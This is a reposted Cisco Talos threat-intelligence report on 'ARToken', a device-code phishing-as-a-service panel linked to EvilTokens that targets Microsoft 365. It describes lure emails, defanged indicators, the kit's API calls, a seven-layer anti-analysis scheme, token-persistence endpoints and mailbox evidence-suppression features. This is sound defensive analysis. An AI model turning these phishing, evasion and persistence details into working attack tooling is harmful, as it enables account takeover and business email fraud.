National Cyber Warfare Foundation (NCWF)

ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365


0 user ratings
2026-07-01 11:53:17
milo
Blue Team (CND)
Talos has identified "ARToken," a phishing-as-a-service platform that targets Microsoft 365. The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token persistence, email access, BEC operations, and SharePoint exfiltration.



  • Cisco Talos identified a fully-featured phishing-as-a-service (PhaaS) operator panel, branded "ARToken," that shares infrastructure, API contracts, and operational patterns with the EvilTokens platform documented by Sekoia and Microsoft in early 2026.

  • The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token (PRT) persistence, email access, business email compromise (BEC) operations, and SharePoint exfiltration — all accessible to operators through a React-based dashboard.

  • Analysis of the platform's publicly served JavaScript bundle reveals the complete post-compromise toolkit available to affiliates, including capabilities not previously detailed in public reporting on EvilTokens.

  • The phishing kit deploys a seven-layer anti-analysis system combining client-side behavioral verification with XOR-encrypted payloads, a more sophisticated evasion approach than the server-side X-Antibot-Token mechanism documented in prior EvilTokens research.



Background: EvilTokens and device code phishing-as-a-service

ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365

In March 2026, Sekoia published a two-part analysis of EvilTokens, a PhaaS platform that abuses Microsoft's OAuth 2.0 Device Authorization Grant (RFC 8628) to capture victim tokens while bypassing multi-factor authentication (MFA) entirely. Microsoft confirmed the campaign's scale in April 2026, noting significantly higher success rates than previous device code attacks, AI-powered personalized lures, and a post-compromise pipeline that included automated device registration for persistent access.

By the time of Microsoft's publication, Sekoia had documented approximately 500 Cloudflare Workers domains and over 1,000 total phishing pages operating under the EvilTokens umbrella, with affiliates targeting finance professionals, HR staff, and logistics personnel across global regions.

EvilTokens' second-stage capabilities, revealed in Sekoia's Part 2 research, include an AI-augmented BEC pipeline chaining Groq-hosted Llama models for financial exposure scoring and GPT-4o-mini for email translation, producing three tailored BEC scenarios per compromised mailbox. The platform sells access at $1,500 one-time plus $500/month, with a standalone "Portal Browser" for $500 lifetime.

The lure in the wild: Vendor-impersonation invoice fraud

Most public reporting on EvilTokens covers the panel and the kit. What it has not shown is how an ARToken lure actually reaches an inbox. Talos recovered two near-identical messages, sent roughly four minutes apart on April 20, 2026, that initiate the chain. The tradecraft is targeted, not spray-and-pray.

ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365
Figure 1. A sample ARToken phishing email

The messages spoof an accounts-payable contact at a legitimate Wisconsin contractor, addressed to an accounts-payable recipient at a U.S. life-sciences company — abusing a real vendor relationship rather than inventing a sender. The lure theme is an outstanding-invoice query ("the following invoices appear to still be outstanding… advise when this will be processed"), the kind of message accounts-payable staff are conditioned to act on. Other features of note in this email include:




  • The From header presents the vendor's real domain, but Reply-To quietly redirects replies to an unrelated domain — a classic reply-pivot that keeps any victim response away from the spoofed organization.

  • All three checks fail: SPF, DKIM (body-hash mismatch), and DMARC (compauth=none reason=405). The display identity is not authenticated from the sending path.

  • Each message carries short random hex strings and an inline signature image (pumber.png), consistent with light per-message mutation to frustrate exact-match content rules.

  • The visible anchor text reads as the vendor's genuine SharePoint tenant:
    “https[:]//mononapfp.sharepoint[.]com/:f:/document/INV-IgCx1X50pgUjR7iAjZL2fuQaAW4GfKVs6wHT3BYv9sgwW7g”



However, the actual href points to a near-identical look-alike tenant — the vendor's name with the .com folded directly into the tenant label — under a different, attacker-controlled Microsoft 365 workspace. Because the destination is still a genuine sharepoint.com host, it inherits SharePoint's clean reputation: “https[:]//mononapfpcom.sharepoint[.]com/:f:/g/IgAdH_aaBPMcQbtINZzC1TsLARj3dHj63MnKjvnY-QJrKEc"

Discovery: The ARToken Panel

ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365
Figure 2. ARToken login page.

During investigation of phishing infrastructure targeting a Talos IR engagement, we identified a management panel at “dashboard-bl.pamconj[.]com” serving a React single-page application (SPA) with a 1.7MB compiled JavaScript bundle. The page title reads "ARToken Panel."

SPA architecture exposes all client-side code including routes, UI labels, component logic, and API endpoint paths in the JavaScript bundle regardless of authentication state. No credentials were required or bypassed.

The associated command-and-control (C2) API operates at “spx.pamconj[.]com”, and phishing lures deploy through Cloudflare Workers accounts including “clear90489058903-document.workers[.]dev”.

Linking ARToken to EvilTokens

The connection between ARToken and EvilTokens rests on multiple overlapping technical indicators:




  • Identical API contract: ARToken's phishing kit issues POST /api/device/start with a JSON body containing userId, clientMode: "broker", login_hint, and redirect_url. The C2 responds with device_code, user_code, verification_uri, and expires_in matching the EvilTokens API contract documented by Sekoia exactly.



ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365
Figure 3. Code request logic.
ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365
Figure 4. Code handling logic.



  • Shared clientMode: "broker" semantics: This parameter instructs the backend to use Microsoft's Authentication Broker (WAM) flow for PRT acquisition. It is not a standard OAuth parameter it is specific to EvilTokens' implementation of persistent token capture.

  • Matching deployment model: Both platforms deploy phishing lures to Cloudflare Workers using UUID-prefixed subdomain patterns. ARToken uses {uuid}-docviewer.workers.dev, {uuid}-onedrive.workers.dev, and {uuid}-adobe2.workers.dev. EvilTokens uses [service]-[random].[target]-s-account.workers.dev. The naming convention and lure themes (Adobe, OneDrive, document viewers) overlap directly.

  • Identical PRT lifecycle:ARToken's API surface includes /prt/setup, /prt/refresh, /prt/renew, /prt/reacquire, and /prt/cookie, the same Primary Refresh Token persistence chain Sekoia documented as EvilTokens' core differentiator over traditional AitM phishing platforms.

  • Shared operational model: Both platforms operate as multi-tenant PhaaS with isolated operator workspaces, Telegram bot notifications on token capture, subscription-based access, and template editors for lure customization.



Technical analysis: The phishing kit 












































Layer Mechanism Purpose
1 User-Agent regex Blocks headless browsers, Selenium, Puppeteer, Playwright, crawlers, wget, curl
2 navigator.webdriver check Detects automation frameworks
3 Browser feature fingerprinting Identifies environments missing window.chrome, navigator.vendor, or touch/mouse APIs
4 Window dimension analysis Catches headless defaults reporting 0x0 outer dimensions
5 Interaction telemetry Requires 3+ mouse moves or 1+ touch events before enabling payload
6 Timing gate Minimum 800ms elapsed since page load
7 Movement pattern analysis Validates mouse coordinate trajectories for organic (non-linear) motion


ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365
Figure 5. Human verification logic.
ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365
Figure 6. Bot detection logic.

This client-side behavioral verification is notably more sophisticated than the server-side X-Antibot-Token mechanism (SHA-256 of secret + timestamp + "antibot" with 5-minute validity window) documented in Sekoia's EvilTokensresearch. The divergence is consistent with EvilTokens' known practice of selling anti-bot pages as a separate product through a dedicated Telegram bot. Affiliates may deploy upgraded or custom anti-analysis modules independently of the core platform.

The phishing payload itself fires on DOMContentLoaded and:




  1. Attempts to steal any existing JWT from localStorage (key: artoken_jwt) for victim session correlation

  2. Extracts the victim's email from the URL ?hint= parameter

  3. Calls the C2 at /device/start with the hardcoded operator UUID 84eb384d-cd3e-4c90-a283-c960ce557913

  4. Displays the returned device code with a countdown timer (default: 900 seconds)

  5. Directs the victim to “microsoft.com/devicelogin”



The kit includes persistAfterPassChange: false, an explicit signal that the operator understands refresh tokens are revoked on password reset and must exfiltrate data or escalate to PRT before the victim responds.

XOR payload encryption

The JavaScript payload is delivered encrypted with a 16-byte XOR key ([233,69,224,219,53,48,213,165,119,243,77,151,101,148,15,227]), decrypted at runtime. This differs from EvilTokens' documented AES-GCM Web Crypto API encryption. The decoded sample analyzed here represents the inner payload after decryption consistent with EvilTokens' delivery model of encrypting phishing content and decrypting client-side to evade static analysis by URL scanners.

The full operator toolkit

The ARToken panel's API surface reveals the complete post-compromise workflow available to operators:

Token management and persistence

Once a victim completes device code authentication, their captured token appears in the ARToken dashboard. Operators can:




  • Refresh tokens to maintain access

  • Escalate to PRT via the /prt/setup → /prt/refresh → /prt/cookie chain, achieving persistence that survives password resets

  • Export and backup tokens in bulk

  • Import tokens from external sources (enabling cross-platform token trading)

  • Share tokens with other operators via generated links with granular permissions



The UI advertises, "PRT-enabled - Persists across password changes."

Email operations (ARTSender)

The built-in BEC tool provides:




  • Full Outlook inbox read access per compromised account

  • Email sending as the victim with BCC batch support and configurable inter-send delays

  • Inbox rule creation for forwarding and auto-deletion (evidence suppression)

  • Keyword-based monitoring across all compromised accounts simultaneously

  • Email attachment access and download



SharePoint and OneDrive access

Operators can browse, upload, download, and manage permissions on victim SharePoint sites and OneDrive files, enabling document theft and malicious file placement for lateral phishing.

Infrastructure automation

The panel integrates directly with Cloudflare's API for:




  • Authenticating via API token or Global API key

  • Listing deployed Workers

  • Deploying phishing templates directly to Workers from the panel

  • Managing allowed origins and worker name prefixes

  • Configuring device code proxy servers



Desktop session browser (ARTBrowser)

A standalone Windows application, functionally equivalent to EvilTokens' "Portal Browser," enables operators to browse victim Microsoft 365 sessions using captured tokens outside the web panel. The admin configures a download URL through the settings panel.

Capabilities not previously documented

Several ARToken features extend beyond what Sekoia's research covered:
































Capability Description
Box Monitor Cross-account keyword monitoring. Operators define terms and receive matches from all compromised mailboxes
Inbox rule manipulation Programmatic creation of forwarding and hiding rules for evidence suppression
Token import Ingest tokens captured by other tools or purchased externally
Shared access links Collaborative token access between operators with role-based permissions
Geo-dynamic templates Lure placeholders ({city}, {country_code}, {state}) that resolve based on victim geolocation
Full SharePoint operations Site resolution, file upload/download, permission management


These features indicate the platform is more mature than a simple device code phishing kit — it is a complete BEC operations environment.

MITRE ATT&CK techniques 






















































Tactic Technique ID
Initial Access Phishing: Spearphishing Link T1566.002
Credential Access Steal Application Access Token T1528
Persistence Account Manipulation: Additional Cloud Credentials T1098.001
Collection Email Collection: Remote Email Collection T1114.002
Lateral Movement Use Alternate Authentication Material: Application Access Token T1550.001
Impact Account Access Removal T1531
Resource Development Acquire Infrastructure: Web Services T1583.006
Stealth Obfuscated Files or Information T1027
Stealth Virtualization/Sandbox Evasion: System Checks T1497.001


Indicators of compromise

The IOCs can also be found in our GitHub repository here.



Source: FSecure
Source Link: https://blog.talosintelligence.com/artoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Blue Team (CND)



Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.